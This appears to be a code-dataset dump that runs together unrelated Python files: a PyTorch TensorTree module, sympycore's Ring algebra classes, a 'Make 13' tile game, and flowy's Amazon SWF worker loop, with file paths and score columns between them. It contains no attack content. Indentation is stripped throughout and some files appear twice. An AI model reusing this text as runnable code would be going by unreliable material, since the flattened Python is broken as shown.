product_add = next_layer(product_add_tensor, product_children)
sum_columns.append(product_add.presence())
sum_children.append(product_add)
sum_add_tensor = torch.stack(sum_columns, 1)
sum_add_tree = this_layer(sum_add_tensor, sum_children)
result = sum_base_tree + sum_add_tree
return result
def apply(self, func):
new_tensor = func(self.tensor)
new_children = [None if child is None else child.apply(func) for child in self.children]
return self.__class__(new_tensor, new_children)
def select_rows(self, mask):
return self.apply(lambda tensor: tensor[mask])
def apply_activation(self, func):
"""
Applies arbitrary activation functions to all tensors of this TensorTree
:param func: Activation function
:return: TreeTensor
"""
return self.apply(func)
@abstractmethod
def _apply_structured_function(self, funcs, tensor):
pass
def apply_structured_activation(self, funcs):
new_tensor = self._apply_structured_function(funcs, self.tensor)
new_children = [None if child is None else child.apply_structured_activation(funcs) for child in self.children]
return self.__class__(new_tensor, new_children)
def __repr__(self):
return 'Tree with content ' + str(self.tensor) + ' and children: ' \
+ str(self.children)
class SumTree(TensorTree):
def presence(self):
return self.tensor.sum(1)
def _apply_structured_function(self, funcs, tensor):
return funcs.sum(tensor)
def _make_strict_tensor(self, tensor, eps):
res = torch.zeros_like(tensor)
max_arg = tensor.max(1)[1]
for (i, j) in enumerate(max_arg):
res[i, j] = 1
return res
def matmul(self, matrix, tree_class):
# Multiply tensor by a matrix
new_tensor = self.tensor.mm(matrix)
_, columns = matrix.size()
new_children = [None] * columns
return tree_class(new_tensor, new_children)
def __repr__(self):
return 'Sum' + super().__repr__()
class ProdTree(TensorTree):
EPS = 1e-3
def presence(self):
return self.tensor.prod(1)
def _apply_structured_function(self, funcs, tensor):
return funcs.prod(tensor)
def _make_strict_tensor(self, tensor, eps):
res = torch.zeros_like(tensor)
res[tensor > eps] = 1
return res
def matmul(self, matrix, tree_class):
new_tensor = self.tensor.mm(matrix)
_, columns = matrix.size()
# Multiply children
new_children = [None] * columns
for (i, child) in enumerate(self.children):
if child is None:
continue
for j in range(columns):
element = matrix[i, j]
if not matrix.children[i][j] or abs(element.item()) < self.EPS:
# Skip such children
continue
multiplied = child.cmul(element)
if new_children[j] is None:
new_children[j] = multiplied
else:
new_children[j] += multiplied
return tree_class(new_tensor, new_children)
def __repr__(self):
return 'Prod' + super().__repr__()
def empty_tree():
return SumTree(torch.tensor([]), [])
def stack(trees):
"""
Concatenates TreeTensors of the same type along 0th direction.
:param trees: List of TreeTensors
:return: Merged TreeTensor
"""
if len(trees) == 0:
return empty_tree()
if len(trees) == 1:
return trees[0]
first = trees[0]
# Stack values of this layer
new_tensor = torch.cat(list(map(lambda t: t.tensor, trees)), 0)
# Stack values of next layers
new_children = []
for cur in range(len(first.children)):
next_trees = list(map(lambda t: t.children[cur], trees))
not_none = next(filter(lambda t: t is not None, next_trees), None)
if not_none is None:
# This child is missing in all trees
new_children.append(None)
else:
# Some trees contain this child
to_stack = []
child_size = len(not_none.children)
for (pos, tree) in enumerate(next_trees):
if tree is not None:
to_stack.append(tree)
else:
# Add fake tree with equal elements (to support loss function)
tree_size = trees[pos].tensor.size()[0]
if isinstance(not_none, SumTree):
content = torch.ones(tree_size, child_size) * (1.0 / child_size)
else:
content = torch.ones(tree_size, child_size) * 0.5
to_stack.append(not_none.__class__(
content,
[None for _ in range(child_size)]
))
stacked = stack(to_stack)
new_children.append(stacked)
return first.__class__(new_tensor, new_children)
def make_tuple(operands):
"""
Creates tuple of operands
:param operands: List of TensorTrees
:return: TensorTree representing tuple
"""
if len(operands) == 0:
return empty_tree()
new_tensor = torch.stack([t.presence() for t in operands], dim=1)
new_children = operands
product = ProdTree(new_tensor, new_children)
rows, _ = new_tensor.size()
sum_data = torch.ones(rows, 1)
return SumTree(sum_data, [product]) | 0.898773 | 0.441793 |
__all__ = ['Ring', 'CommutativeRing']
from ..basealgebra import Algebra
from .interface import RingInterface
from ..core import init_module, classes
init_module.import_heads()
init_module.import_numbers()
@init_module
def _init(m):
from ..arithmetic import mpq
Ring.coefftypes = (int, long, mpq)
class Ring(Algebra, RingInterface):
"""
Ring represents algebraic ring (R, +, *) where (R, +) is abelian
group, (R,*) is monoid, with distributivity.
"""
@classmethod
def get_function_algebra(cls):
return classes.FunctionRing
def __str__(self):
h, d = self.pair
return h.data_to_str_and_precedence(type(self), d)[0]
def __pos__(self):
return self
def __neg__(self):
return self.head.neg(type(self), self)
def __add__(self, other):
cls = type(self)
tother = type(other)
if tother is not cls:
if tother in numbertypes_set:
return self.head.add_number(cls, self, other)
other = cls.convert(other, typeerror=False)
if other is NotImplemented: return NotImplemented
return self.head.add(cls, self, other)
__radd__ = __add__
def __iadd__(self, other):
cls = type(self)
if type(other) is not cls:
other = cls.convert(other, typeerror=False)
if other is NotImplemented: return NotImplemented
return self.head.inplace_add(cls, self, other)
def __sub__(self, other):
cls = type(self)
tother = type(other)
if tother is not cls:
if tother in numbertypes_set:
return self.head.sub_number(cls, self, other)
other = cls.convert(other, typeerror=False)
if other is NotImplemented: return NotImplemented
return self.head.sub(cls, self, other)
def __rsub__(self, other):
return other + (-self)
def __isub__(self, other):
cls = type(self)
if type(other) is not cls:
other = cls.convert(other, typeerror=False)
if other is NotImplemented: return NotImplemented
return self.head.inplace_add(cls, self, -other)
def __mul__(self, other):
cls = type(self)
tother = type(other)
if cls is not tother:
if tother in numbertypes_set:
return self.head.non_commutative_mul_number(cls, self, other)
other = cls.convert(other, typeerror=False)
if other is NotImplemented: return NotImplemented
return self.head.non_commutative_mul(cls, self, other)
def __rmul__(self, other):
cls = type(self)
tother = type(other)
if cls is not tother:
if tother in numbertypes_set:
return self.head.non_commutative_rmul_number(cls, self, other)
other = cls.convert(other, typeerror=False)
if other is NotImplemented: return NotImplemented
return other.head.non_commutative_mul(cls, other, self)
def __pow__(self, other):
cls = type(self)
tother = type(other)
if tother is not cls:
if tother in numbertypes_set:
return self.head.pow_number(cls, self, other)
other = cls.convert(other, typeerror=False)
if other is NotImplemented: return NotImplemented
return self.head.pow(cls, self, other)
def __rpow__(self, other):
cls = type(self)
tother = type(other)
if cls is not tother:
other = cls.convert(other, typeerror=False)
if other is NotImplemented: return NotImplemented
return other.head.pow(cls, other, self)
def __div__(self, other):
cls = type(self)
tother = type(other)
if tother is not cls:
if tother in numbertypes_set:
return self.head.non_commutative_div_number(cls, self, other)
other = cls.convert(other, typeerror=False)
if other is NotImplemented: return NotImplemented
return self * other**-1
def __rdiv__(self, other):
cls = type(self)
tother = type(other)
if cls is not tother:
other = cls.convert(other, typeerror=False)
if other is NotImplemented: return NotImplemented
return other * self**-1
__truediv__ = __div__
def expand(self):
return self.head.expand(type(self), self)
def evalf(self, n=None):
return self.head.evalf(type(self), self, n)
class CommutativeRing(Ring):
def __mul__(self, other):
cls = type(self)
tother = type(other)
if tother is not cls:
if tother in numbertypes_set:
return self.head.commutative_mul_number(cls, self, other)
other = cls.convert(other, typeerror=False)
if other is NotImplemented:
return NotImplemented
return self.head.commutative_mul(cls, self, other)
__rmul__ = __mul__
def __imul__(self, other):
cls = type(self)
if type(other) is not cls:
other = cls.convert(other, typeerror=False)
if other is NotImplemented:
return NotImplemented
return self.head.inplace_commutative_mul(cls, self, other)
def __div__(self, other):
cls = type(self)
tother = type(other)
if tother is not cls:
if tother in numbertypes_set:
return self.head.commutative_div_number(cls, self, other)
other = cls.convert(other, typeerror=False)
if other is NotImplemented:
return NotImplemented
return self.head.commutative_div(cls, self, other)
def __rdiv__(self, other):
cls = type(self)
tother = type(other)
if tother is not cls:
if tother in numbertypes_set:
return self.head.commutative_rdiv_number(cls, self, other)
other = cls.convert(other, typeerror=False)
if other is NotImplemented:
return NotImplemented
return other * self**-1
def to(self, target, *args):
""" Convert expression to target representation.
The following targets are recognized:
EXP_COEFF_DICT - convert expression to exponents-coefficient
representation, additional arguments are variables. When
no arguments are specified, variables will be all symbols
and non-power expressions used in the expression.
TERM_COEFF_DICT - convert expression to term-coefficient
representation. Note that the returned result may have
actual head NUMBER, SYMBOL, TERM_COEFF, POW, or
BASE_EXP_DICT instead of TERM_COEFF_DICT.
"""
head, data = self.pair
if target is head:
return self
if target is EXP_COEFF_DICT:
return head.to_EXP_COEFF_DICT(type(self), data, self, args or None)
if target is TERM_COEFF_DICT:
return head.to_TERM_COEFF_DICT(type(self), data, self)
raise NotImplementedError('%s.to(target=%r)' % (type(self), target))
def diff(self, symbol, order=1):
if order==0:
return self
cls = type(self)
if type(symbol) is cls:
assert symbol.head is SYMBOL,`symbol.pair`
symbol = symbol.data
elif isinstance(symbol, str):
pass
else:
raise TypeError('diff(symbol, order) first argument must be str or %s instance but got %s instance' % (cls.__name__, type(symbol).__name__))
try:
cache = {}
result = self.head.diff(cls, self.data, self, symbol, order, cache=cache)
finally:
cache.clear()
return result
def integrate(self, x):
cls = type(self)
t = type(x)
if t is tuple:
x, a, b = x
t = type(x)
else:
a, b = None, None
if t is cls:
assert x.head is SYMBOL,`x.pair`
x = x.data
elif t is str:
pass
else:
raise TypeError('integrate(x,..), x must be str or %s instance but got %s instance' % (cls.__name__, type(symbol).__name__))
if a is None:
return self.head.integrate_indefinite(cls, self.data, self, x)
if type(a) is not cls:
a = cls(a)
if type(b) is not cls:
b = cls(b)
return self.head.integrate_definite(cls, self.data, self, x, a, b)
classes.Ring = Ring
classes.CommutativeRing = CommutativeRing | sympycore/ring/algebra.py | __all__ = ['Ring', 'CommutativeRing']
from ..basealgebra import Algebra
from .interface import RingInterface
from ..core import init_module, classes
init_module.import_heads()
init_module.import_numbers()
@init_module
def _init(m):
from ..arithmetic import mpq
Ring.coefftypes = (int, long, mpq)
class Ring(Algebra, RingInterface):
"""
Ring represents algebraic ring (R, +, *) where (R, +) is abelian
group, (R,*) is monoid, with distributivity.
"""
@classmethod
def get_function_algebra(cls):
return classes.FunctionRing
def __str__(self):
h, d = self.pair
return h.data_to_str_and_precedence(type(self), d)[0]
def __pos__(self):
return self
def __neg__(self):
return self.head.neg(type(self), self)
def __add__(self, other):
cls = type(self)
tother = type(other)
if tother is not cls:
if tother in numbertypes_set:
return self.head.add_number(cls, self, other)
other = cls.convert(other, typeerror=False)
if other is NotImplemented: return NotImplemented
return self.head.add(cls, self, other)
__radd__ = __add__
def __iadd__(self, other):
cls = type(self)
if type(other) is not cls:
other = cls.convert(other, typeerror=False)
if other is NotImplemented: return NotImplemented
return self.head.inplace_add(cls, self, other)
def __sub__(self, other):
cls = type(self)
tother = type(other)
if tother is not cls:
if tother in numbertypes_set:
return self.head.sub_number(cls, self, other)
other = cls.convert(other, typeerror=False)
if other is NotImplemented: return NotImplemented
return self.head.sub(cls, self, other)
def __rsub__(self, other):
return other + (-self)
def __isub__(self, other):
cls = type(self)
if type(other) is not cls:
other = cls.convert(other, typeerror=False)
if other is NotImplemented: return NotImplemented
return self.head.inplace_add(cls, self, -other)
def __mul__(self, other):
cls = type(self)
tother = type(other)
if cls is not tother:
if tother in numbertypes_set:
return self.head.non_commutative_mul_number(cls, self, other)
other = cls.convert(other, typeerror=False)
if other is NotImplemented: return NotImplemented
return self.head.non_commutative_mul(cls, self, other)
def __rmul__(self, other):
cls = type(self)
tother = type(other)
if cls is not tother:
if tother in numbertypes_set:
return self.head.non_commutative_rmul_number(cls, self, other)
other = cls.convert(other, typeerror=False)
if other is NotImplemented: return NotImplemented
return other.head.non_commutative_mul(cls, other, self)
def __pow__(self, other):
cls = type(self)
tother = type(other)
if tother is not cls:
if tother in numbertypes_set:
return self.head.pow_number(cls, self, other)
other = cls.convert(other, typeerror=False)
if other is NotImplemented: return NotImplemented
return self.head.pow(cls, self, other)
def __rpow__(self, other):
cls = type(self)
tother = type(other)
if cls is not tother:
other = cls.convert(other, typeerror=False)
if other is NotImplemented: return NotImplemented
return other.head.pow(cls, other, self)
def __div__(self, other):
cls = type(self)
tother = type(other)
if tother is not cls:
if tother in numbertypes_set:
return self.head.non_commutative_div_number(cls, self, other)
other = cls.convert(other, typeerror=False)
if other is NotImplemented: return NotImplemented
return self * other**-1
def __rdiv__(self, other):
cls = type(self)
tother = type(other)
if cls is not tother:
other = cls.convert(other, typeerror=False)
if other is NotImplemented: return NotImplemented
return other * self**-1
__truediv__ = __div__
def expand(self):
return self.head.expand(type(self), self)
def evalf(self, n=None):
return self.head.evalf(type(self), self, n)
class CommutativeRing(Ring):
def __mul__(self, other):
cls = type(self)
tother = type(other)
if tother is not cls:
if tother in numbertypes_set:
return self.head.commutative_mul_number(cls, self, other)
other = cls.convert(other, typeerror=False)
if other is NotImplemented:
return NotImplemented
return self.head.commutative_mul(cls, self, other)
__rmul__ = __mul__
def __imul__(self, other):
cls = type(self)
if type(other) is not cls:
other = cls.convert(other, typeerror=False)
if other is NotImplemented:
return NotImplemented
return self.head.inplace_commutative_mul(cls, self, other)
def __div__(self, other):
cls = type(self)
tother = type(other)
if tother is not cls:
if tother in numbertypes_set:
return self.head.commutative_div_number(cls, self, other)
other = cls.convert(other, typeerror=False)
if other is NotImplemented:
return NotImplemented
return self.head.commutative_div(cls, self, other)
def __rdiv__(self, other):
cls = type(self)
tother = type(other)
if tother is not cls:
if tother in numbertypes_set:
return self.head.commutative_rdiv_number(cls, self, other)
other = cls.convert(other, typeerror=False)
if other is NotImplemented:
return NotImplemented
return other * self**-1
def to(self, target, *args):
""" Convert expression to target representation.
The following targets are recognized:
EXP_COEFF_DICT - convert expression to exponents-coefficient
representation, additional arguments are variables. When
no arguments are specified, variables will be all symbols
and non-power expressions used in the expression.
TERM_COEFF_DICT - convert expression to term-coefficient
representation. Note that the returned result may have
actual head NUMBER, SYMBOL, TERM_COEFF, POW, or
BASE_EXP_DICT instead of TERM_COEFF_DICT.
"""
head, data = self.pair
if target is head:
return self
if target is EXP_COEFF_DICT:
return head.to_EXP_COEFF_DICT(type(self), data, self, args or None)
if target is TERM_COEFF_DICT:
return head.to_TERM_COEFF_DICT(type(self), data, self)
raise NotImplementedError('%s.to(target=%r)' % (type(self), target))
def diff(self, symbol, order=1):
if order==0:
return self
cls = type(self)
if type(symbol) is cls:
assert symbol.head is SYMBOL,`symbol.pair`
symbol = symbol.data
elif isinstance(symbol, str):
pass
else:
raise TypeError('diff(symbol, order) first argument must be str or %s instance but got %s instance' % (cls.__name__, type(symbol).__name__))
try:
cache = {}
result = self.head.diff(cls, self.data, self, symbol, order, cache=cache)
finally:
cache.clear()
return result
def integrate(self, x):
cls = type(self)
t = type(x)
if t is tuple:
x, a, b = x
t = type(x)
else:
a, b = None, None
if t is cls:
assert x.head is SYMBOL,`x.pair`
x = x.data
elif t is str:
pass
else:
raise TypeError('integrate(x,..), x must be str or %s instance but got %s instance' % (cls.__name__, type(symbol).__name__))
if a is None:
return self.head.integrate_indefinite(cls, self.data, self, x)
if type(a) is not cls:
a = cls(a)
if type(b) is not cls:
b = cls(b)
return self.head.integrate_definite(cls, self.data, self, x, a, b)
classes.Ring = Ring
classes.CommutativeRing = CommutativeRing | 0.681197 | 0.107437 |
import tile_generators
__author__ = "<NAME> and <NAME>"
__copyright__ = "Copyright 2017, The University of Queensland"
__license__ = "MIT"
__version__ = "1.1.2"
import model
import game_regular
from modules.weighted_selector import WeightedSelector
class LevelTile(model.AbstractTile):
"""Tile whose value & type are equal, incrementing by one when joined."""
def __init__(self, value=1):
"""Constructor
Parameters:
value (int): The tile's value.
"""
super().__init__(None, value)
def get_type(self):
"""Returns the type (value) of this tile."""
return self.get_value()
def is_max(self):
return False
def is_combo_max(self):
return False
def join(self, others):
"""
Joins other tiles to this tile.
Parameters:
others (iterable(BasicTile)): The other tiles to join.
"""
self._value += 1
def __eq__(self, other):
return self._value == other._value
class Make13Game(game_regular.RegularGame):
"""Make13 Lolo game.
Groups of two or more can be combined to increase tile's value by one.
Game is won when a 13 is made.
"""
GAME_NAME = "Make 13"
def __init__(self, size=(6, 6), initial_tiles=4, goal_value=13, min_group=2,
animation=True, autofill=True):
"""Constructor
Parameters:
size (tuple<int, int>): The number of (rows, columns) in the game.
initial_tiles (int): The number of tiles.
goal_value (int): The value of the goal tile.
min_group (int): The minimum number of tiles required for a
connected group to be joinable.
animation (bool): If True, animation will be enabled.
autofill (bool): Automatically fills the grid iff True.
"""
self.goal_value = goal_value
self.initial_tiles = initial_tiles
super().__init__(size=size, min_group=min_group, animation=animation,
autofill=False)
self._selector = WeightedSelector({1: 1})
self.reset()
generator = tile_generators.WeightedGenerator(self._selector,
self._construct_tile)
rows, columns = size
self.grid = model.LoloGrid(generator, rows=rows, columns=columns,
animation=animation)
if autofill:
self.grid.fill()
self._score = self.get_default_score()
self.generator = generator
def get_default_score(self):
"""(int) Returns the default score."""
return max(tile.get_value() for _, tile in self.grid.items())
def reset(self):
"""Resets the game."""
weights = {i: self.get_tile_weight(i) for i in
range(1, self.initial_tiles + 1)}
self._selector.update(weights, clear=True)
super().reset()
def get_tile_weight(self, value):
"""(float) Returns the weighting for a tile of given value."""
return 2 ** (self.goal_value - value)
def _construct_tile(self, type, position, *args, **kwargs):
"""(LevelTile) Returns a new tile from the generator's selection.
Parameters:
type (*): The type of the tile.
position (tuple<int, int>): The position the tile will initially exist in. Unused.
*args: Extra positional arguments for the tile.
**kwargs: Extra keyword arguments for the tile.
"""
# TODO: remove when serialize is implemented properly
args = args[1:]
return LevelTile(type, *args, **kwargs)
def update_score_on_activate(self, current, connections):
"""Updates the score based upon the current tile & connected tiles that
were joined to it.
Parameter:
current (AbstractTile): The tile recently current to.
connected (tuple<AbstractTiles>): The tiles that were joined to
current.
"""
if current.get_value() > self._score:
# Update score
score = current.get_value()
self._score = score
# Unlock new tile
self._selector[score] = self.get_tile_weight(score)
self.set_score(score)
if current.get_value() == self.goal_value:
self.emit('game_over') | game_make13.py | import tile_generators
__author__ = "<NAME> and <NAME>"
__copyright__ = "Copyright 2017, The University of Queensland"
__license__ = "MIT"
__version__ = "1.1.2"
import model
import game_regular
from modules.weighted_selector import WeightedSelector
class LevelTile(model.AbstractTile):
"""Tile whose value & type are equal, incrementing by one when joined."""
def __init__(self, value=1):
"""Constructor
Parameters:
value (int): The tile's value.
"""
super().__init__(None, value)
def get_type(self):
"""Returns the type (value) of this tile."""
return self.get_value()
def is_max(self):
return False
def is_combo_max(self):
return False
def join(self, others):
"""
Joins other tiles to this tile.
Parameters:
others (iterable(BasicTile)): The other tiles to join.
"""
self._value += 1
def __eq__(self, other):
return self._value == other._value
class Make13Game(game_regular.RegularGame):
"""Make13 Lolo game.
Groups of two or more can be combined to increase tile's value by one.
Game is won when a 13 is made.
"""
GAME_NAME = "Make 13"
def __init__(self, size=(6, 6), initial_tiles=4, goal_value=13, min_group=2,
animation=True, autofill=True):
"""Constructor
Parameters:
size (tuple<int, int>): The number of (rows, columns) in the game.
initial_tiles (int): The number of tiles.
goal_value (int): The value of the goal tile.
min_group (int): The minimum number of tiles required for a
connected group to be joinable.
animation (bool): If True, animation will be enabled.
autofill (bool): Automatically fills the grid iff True.
"""
self.goal_value = goal_value
self.initial_tiles = initial_tiles
super().__init__(size=size, min_group=min_group, animation=animation,
autofill=False)
self._selector = WeightedSelector({1: 1})
self.reset()
generator = tile_generators.WeightedGenerator(self._selector,
self._construct_tile)
rows, columns = size
self.grid = model.LoloGrid(generator, rows=rows, columns=columns,
animation=animation)
if autofill:
self.grid.fill()
self._score = self.get_default_score()
self.generator = generator
def get_default_score(self):
"""(int) Returns the default score."""
return max(tile.get_value() for _, tile in self.grid.items())
def reset(self):
"""Resets the game."""
weights = {i: self.get_tile_weight(i) for i in
range(1, self.initial_tiles + 1)}
self._selector.update(weights, clear=True)
super().reset()
def get_tile_weight(self, value):
"""(float) Returns the weighting for a tile of given value."""
return 2 ** (self.goal_value - value)
def _construct_tile(self, type, position, *args, **kwargs):
"""(LevelTile) Returns a new tile from the generator's selection.
Parameters:
type (*): The type of the tile.
position (tuple<int, int>): The position the tile will initially exist in. Unused.
*args: Extra positional arguments for the tile.
**kwargs: Extra keyword arguments for the tile.
"""
# TODO: remove when serialize is implemented properly
args = args[1:]
return LevelTile(type, *args, **kwargs)
def update_score_on_activate(self, current, connections):
"""Updates the score based upon the current tile & connected tiles that
were joined to it.
Parameter:
current (AbstractTile): The tile recently current to.
connected (tuple<AbstractTiles>): The tiles that were joined to
current.
"""
if current.get_value() > self._score:
# Update score
score = current.get_value()
self._score = score
# Unlock new tile
self._selector[score] = self.get_tile_weight(score)
self.set_score(score)
if current.get_value() == self.goal_value:
self.emit('game_over') | 0.836788 | 0.339034 |
import os
import socket
import venusian
from botocore.exceptions import ClientError
from flowy.swf.client import SWFClient, IDENTITY_SIZE
from flowy.swf.decision import SWFActivityDecision
from flowy.swf.decision import SWFWorkflowDecision
from flowy.swf.history import SWFExecutionHistory
from flowy.utils import logger
from flowy.utils import setup_default_logger
from flowy.worker import Worker
__all__ = ['SWFWorkflowWorker', 'SWFActivityWorker']
class SWFWorker(Worker):
def __init__(self):
super(SWFWorker, self).__init__()
self.remote_reg_callbacks = []
def __call__(self, name, version, input_data, decision, *extra_args):
return super(SWFWorker, self).__call__(
(str(name), str(version)), input_data, decision, *extra_args)
def register_remote(self, swf_client, domain):
"""Register or check compatibility of all configs in Amazon SWF."""
for remote_reg_callback in self.remote_reg_callbacks:
# Raises if there are registration problems
remote_reg_callback(swf_client, domain)
def register(self, config, func, version, name=None):
super(SWFWorker, self).register(config, func, (name, version))
def add_remote_reg_callback(self, callback):
self.remote_reg_callbacks.append(callback)
def make_scanner(self):
return venusian.Scanner(
register_task=self.register_task,
add_remote_reg_callback=self.add_remote_reg_callback)
class SWFWorkflowWorker(SWFWorker):
categories = ['swf_workflow']
# Be explicit about what arguments are expected
def __call__(self, name, version, input_data, decision, execution_history):
super(SWFWorkflowWorker, self).__call__(
name, version, input_data, decision, # needed for worker logic
decision, execution_history) # extra_args passed to proxies
def break_loop(self):
"""Used to exit the loop in tests. Return True to break."""
return False
def run_forever(self, domain, task_list,
swf_client=None,
setup_log=True,
register_remote=True,
identity=None):
"""Starts an endless single threaded/single process worker loop.
The worker polls endlessly for new decisions from the specified domain
and task list and runs them.
If reg_remote is set, all registered workflow are registered remotely.
An identity can be set to track this worker in the SWF console,
otherwise a default identity is generated from this machine domain and
process pid.
If setup_log is set, a default configuration for the logger is loaded.
A custom SWF client can be passed in swf_client, otherwise a default
client is used.
"""
if setup_log:
setup_default_logger()
identity = default_identity() if identity is None else identity
swf_client = SWFClient() if swf_client is None else swf_client
if register_remote:
self.register_remote(swf_client, domain)
try:
while 1:
if self.break_loop():
break
name, version, input_data, exec_history, decision = poll_decision(
swf_client, domain, task_list, identity)
self(name, version, input_data, decision, exec_history)
except KeyboardInterrupt:
pass
class SWFActivityWorker(SWFWorker):
categories = ['swf_activity']
# Be explicit about what arguments are expected
def __call__(self, name, version, input_data, decision):
# No extra arguments are used
super(SWFActivityWorker, self).__call__(
name, version, input_data, decision, # needed for worker logic
decision.heartbeat) # extra_args
def break_loop(self):
"""Used to exit the loop in tests. Return True to break."""
return False
def run_forever(self, domain, task_list,
swf_client=None,
setup_log=True,
register_remote=True,
identity=None):
"""Same as SWFWorkflowWorker.run_forever but for activities."""
if setup_log:
setup_default_logger()
identity = default_identity() if identity is None else identity
swf_client = SWFClient() if swf_client is None else swf_client
if register_remote:
self.register_remote(swf_client, domain)
try:
while 1:
if self.break_loop():
break
swf_response = {}
while not swf_response.get('taskToken'):
try:
swf_response = swf_client.poll_for_activity_task(
domain, task_list, identity=identity)
except ClientError:
# add a delay before retrying?
logger.exception('Error while polling for activities:')
at = swf_response['activityType']
decision = SWFActivityDecision(swf_client, swf_response['taskToken'])
self(at['name'], at['version'], swf_response['input'], decision)
except KeyboardInterrupt:
pass
def default_identity():
"""Generate a local identity string for this process."""
identity = "%s-%s" % (socket.getfqdn(), os.getpid())
return identity[-IDENTITY_SIZE:] # keep the most important part
def poll_decision(swf_client, domain, task_list, identity=None):
"""Poll a decision and create a SWFWorkflowContext structure.
:type swf_client: :class:`SWFClient`
:param swf_client: an implementation or duck typing of :class:`SWFClient`
:param domain: the domain containing the task list to poll
:param task_list: the task list from which to poll decision
:param identity: an identity str of the request maker
:rtype: tuple
:returns: a tuple consisting of (name, version, input_data,
:class:'SWFExecutionHistory', :class:`SWFWorkflowDecision`)
"""
first_page = poll_first_page(swf_client, domain, task_list, identity)
token = first_page['taskToken']
all_events = events(swf_client, domain, task_list, first_page, identity)
# Sometimes the first event is on the second page,
# and the first page is empty
first_event = next(all_events)
assert first_event['eventType'] == 'WorkflowExecutionStarted'
wesea = 'workflowExecutionStartedEventAttributes'
assert first_event[wesea]['taskList']['name'] == task_list
task_duration = first_event[wesea]['taskStartToCloseTimeout']
workflow_duration = first_event[wesea]['executionStartToCloseTimeout']
tags = first_event[wesea].get('tagList', None)
child_policy = first_event[wesea]['childPolicy']
name = first_event[wesea]['workflowType']['name']
version = first_event[wesea]['workflowType']['version']
input_data = first_event[wesea]['input']
try:
running, timedout, results, errors, order = load_events(all_events)
except _PaginationError:
# There's nothing better to do than to retry
return poll_decision(swf_client, domain, task_list, identity)
execution_history = SWFExecutionHistory(running, timedout, results, errors, order)
decision = SWFWorkflowDecision(swf_client, token, name, version, task_list,
task_duration, workflow_duration, tags,
child_policy)
return name, version, input_data, execution_history, decision
def poll_first_page(swf_client, domain, task_list, identity=None):
"""Return the response from loading the first page. In case of errors,
empty responses or whatnot retry until a valid response.
:type swf_client: :class:`SWFClient`
:param swf_client: an implementation or duck typing of :class:`SWFClient`
:param domain: the domain containing the task list to poll
:param task_list: the task list from which to poll for events
:param identity: an identity str of the request maker
:rtype: dict[str, str|int|list|dict]
:returns: a dict containing workflow information and list of events
"""
swf_response = {}
while not swf_response.get('taskToken'):
try:
swf_response = swf_client.poll_for_decision_task(domain, task_list,
identity=identity)
except ClientError:
logger.exception('Error while polling for decisions:')
return swf_response
def poll_page(swf_client, domain, task_list, token, identity=None):
"""Return a specific page. In case of errors retry a number of times.
:type swf_client: :class:`SWFClient`
:param swf_client: an implementation or duck typing of :class:`SWFClient`
:param domain: the domain containing the task list to poll
:param task_list: the task list from which to poll for events
:param token: the token string for the requested page
:param identity: an identity str of the request maker
:rtype: dict[str, str|int|list|dict]
:returns: a dict containing workflow information and list of events
"""
for _ in range(7): # give up after a limited number of retries
try:
swf_response = swf_client.poll_for_decision_task(
domain, task_list, identity=identity, next_page_token=token)
break
except ClientError:
logger.exception('Error while polling for decision page:')
else:
raise _PaginationError()
return swf_response
def events(swf_client, domain, task_list, first_page, identity=None):
"""Load pages one by one and generate all events found.
:type swf_client: :class:`SWFClient`
:param swf_client: an implementation or duck typing of :class:`SWFClient`
:param domain: the domain containing the task list to poll
:param task_list: the task list from which to poll for events
:param first_page: the page dict structure from which to start generating
the events, usually the response from :func:`poll_first_page`
:param identity: an identity str of the request maker
:rtype: collections.Iterator[dict[str, int|str|dict[str, int|str|dict]]
:returns: iterator over all of the events
"""
page = first_page
while 1:
for event in page['events']:
yield event
if not page.get('nextPageToken'):
break
page = poll_page(swf_client, domain, task_list, page['nextPageToken'],
identity=identity)
def load_events(event_iter):
"""Combine all events in their order.
This returns a tuple of the following things:
running - a set of the ids of running tasks
timedout - a set of the ids of tasks that have timedout
results - a dictionary of id -> result for each finished task
errors - a dictionary of id -> error message for each failed task
order - an list of task ids in the order they finished
"""
running, timedout = set(), set()
results, errors = {}, {}
order = []
event2call = {}
for event in event_iter:
e_type = event.get('eventType')
if e_type == 'ActivityTaskScheduled':
eid = event['activityTaskScheduledEventAttributes']['activityId']
event2call[event['eventId']] = eid
running.add(eid)
elif e_type == 'ActivityTaskCompleted':
atcea = 'activityTaskCompletedEventAttributes'
eid = event2call[event[atcea]['scheduledEventId']]
result = event[atcea]['result']
running.remove(eid)
results[eid] = result
order.append(eid)
elif e_type == 'ActivityTaskFailed':
atfea = 'activityTaskFailedEventAttributes'
eid = event2call[event[atfea]['scheduledEventId']]
reason = event[atfea]['reason']
running.remove(eid)
errors[eid] = reason
order.append(eid)
elif e_type == 'ActivityTaskTimedOut':
attoea = 'activityTaskTimedOutEventAttributes'
eid = event2call[event[attoea]['scheduledEventId']]
running.remove(eid)
timedout.add(eid)
order.append(eid)
elif e_type == 'ScheduleActivityTaskFailed':
satfea = 'scheduleActivityTaskFailedEventAttributes'
eid = event[satfea]['activityId']
reason = event[satfea]['cause']
# when a job is not found it's not even started
errors[eid] = reason
order.append(eid)
elif e_type == 'StartChildWorkflowExecutionInitiated':
scweiea = 'startChildWorkflowExecutionInitiatedEventAttributes'
eid = _subworkflow_call_key(event[scweiea]['workflowId'])
running.add(eid)
elif e_type == 'ChildWorkflowExecutionCompleted':
cwecea = 'childWorkflowExecutionCompletedEventAttributes'
eid = _subworkflow_call_key(
event[cwecea]['workflowExecution']['workflowId'])
result = event[cwecea]['result']
running.remove(eid)
results[eid] = result
order.append(eid)
elif e_type == 'ChildWorkflowExecutionFailed':
cwefea = 'childWorkflowExecutionFailedEventAttributes'
eid = _subworkflow_call_key(
event[cwefea]['workflowExecution']['workflowId'])
reason = event[cwefea]['reason']
running.remove(eid)
errors[eid] = reason
order.append(eid)
elif e_type == 'ChildWorkflowExecutionTimedOut':
cwetoea = 'childWorkflowExecutionTimedOutEventAttributes'
eid = _subworkflow_call_key(
event[cwetoea]['workflowExecution']['workflowId'])
running.remove(eid)
timedout.add(eid)
order.append(eid)
elif e_type == 'StartChildWorkflowExecutionFailed':
scwefea = 'startChildWorkflowExecutionFailedEventAttributes'
eid = _subworkflow_call_key(event[scwefea]['workflowId'])
reason = event[scwefea]['cause']
errors[eid] = reason
order.append(eid)
elif e_type == 'TimerStarted':
eid = event['timerStartedEventAttributes']['timerId']
running.add(eid)
elif e_type == 'TimerFired':
eid = event['timerFiredEventAttributes']['timerId']
running.remove(eid)
results[eid] = None
return running, timedout, results, errors, order
class _PaginationError(Exception):
"""Can't retrieve the next page after X retries."""
